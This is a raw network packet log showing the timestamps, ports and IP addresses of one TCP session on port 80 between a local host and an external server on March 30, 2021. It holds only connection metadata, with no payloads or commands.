Mar 30, 2021 14:22:52.291335106 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291364908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291390896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291419029 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291436911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291445971 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291481018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291517019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291538000 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291544914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291573048 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291599989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291605949 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291625977 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291652918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291680098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291682005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291713953 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291743994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291760921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291770935 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291800022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291826963 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291835070 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291853905 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291883945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291902065 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.291912079 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291946888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291976929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.291979074 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292005062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292033911 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292041063 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292062044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292088985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292117119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292124033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292144060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292176962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292198896 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292207956 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292236090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292262077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292279005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292289019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292316914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292344093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292361975 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292371988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292407036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292433977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292438030 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292469025 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292495966 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292503119 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292521954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292550087 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292577028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292577028 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292607069 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292640924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292646885 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292670965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292699099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292726994 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292735100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292756081 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292783022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292812109 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292810917 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292839050 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292872906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292876005 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292905092 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292932987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292962074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.292964935 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.292989969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293015957 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293045044 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293045044 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293071985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293107033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293107033 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293137074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293164968 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293170929 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293194056 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293220997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293226957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293246984 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293276072 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293303013 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293317080 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293338060 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293351889 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293369055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293425083 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293431997 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293452978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293479919 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293498039 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293507099 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293534040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293560982 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293565989 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293589115 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293622017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293634892 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293653965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293680906 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293708086 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293710947 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293735981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293761969 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293764114 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293788910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293811083 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293817043 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293850899 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293864012 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293883085 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293910980 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293925047 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293939114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293967962 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.293987036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.293996096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294027090 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294039965 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294054985 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294090986 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294105053 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294121981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294150114 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294174910 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294177055 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294207096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294224977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294234037 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294261932 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294286966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294290066 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294325113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294339895 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294356108 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294383049 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294410944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294410944 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294439077 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294466019 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294471025 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294493914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294521093 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.294527054 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.294650078 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.297147036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.384735107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.384840965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.384902954 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.384970903 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385049105 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385096073 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385114908 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385170937 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385176897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385230064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385243893 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385307074 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385313988 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385370970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385456085 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385481119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385549068 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385610104 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385616064 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385670900 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385735989 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385771036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385796070 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385858059 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385890961 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.385926008 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.385996103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386034966 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386059046 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386121035 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386157036 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386184931 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386246920 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386281013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386307955 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386368990 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386375904 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386440039 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386519909 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386555910 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386584997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386646032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386653900 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386708975 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386768103 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386811018 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386826038 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.386905909 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.386941910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387022018 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387125969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.387162924 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387358904 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387435913 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387443066 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.387590885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387670994 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.387763023 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387873888 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387948036 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.387954950 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.388026953 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388128042 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.388185978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388346910 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388427973 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.388459921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388600111 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388672113 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388678074 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.388773918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388858080 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.388874054 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.388968945 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389055967 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.389077902 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389163017 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389259100 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.389271021 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389372110 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389473915 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.389513016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389653921 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389741898 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.389754057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389880896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.389957905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.389975071 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390080929 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390153885 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390177965 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390273094 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390326977 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390343904 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390371084 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390470028 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390547037 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390564919 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390607119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390645981 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390683889 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390723944 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390734911 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390774012 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390814066 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390818119 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390861034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390867949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390918016 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.390940905 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.390973091 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391017914 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391058922 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391091108 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391098022 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391136885 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391174078 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391175032 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391211987 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391233921 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391261101 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391297102 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391304970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391345978 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391371012 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391386032 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391391039 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391427040 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391464949 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391505003 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391505957 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391545057 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391585112 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391592026 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391633034 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391635895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391674995 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391714096 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391720057 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391767979 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391808033 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391846895 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391854048 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391885996 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391922951 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391933918 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.391974926 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.391979933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392018080 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392059088 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392064095 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392112970 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392151117 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392155886 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392190933 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392218113 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392230988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392268896 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392307997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392328978 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392349005 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392385960 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392399073 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392441988 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392462969 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392479897 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392513990 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392518997 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392558098 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392596006 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392601013 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392635107 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392672062 CEST	80	49744	45.139.236.6	192.168.2.4
Mar 30, 2021 14:22:52.392683029 CEST	49744	80	192.168.2.4	45.139.236.6
Mar 30, 2021 14:22:52.392721891 CEST	80	49744	45.139.236.6	192.168.2.4
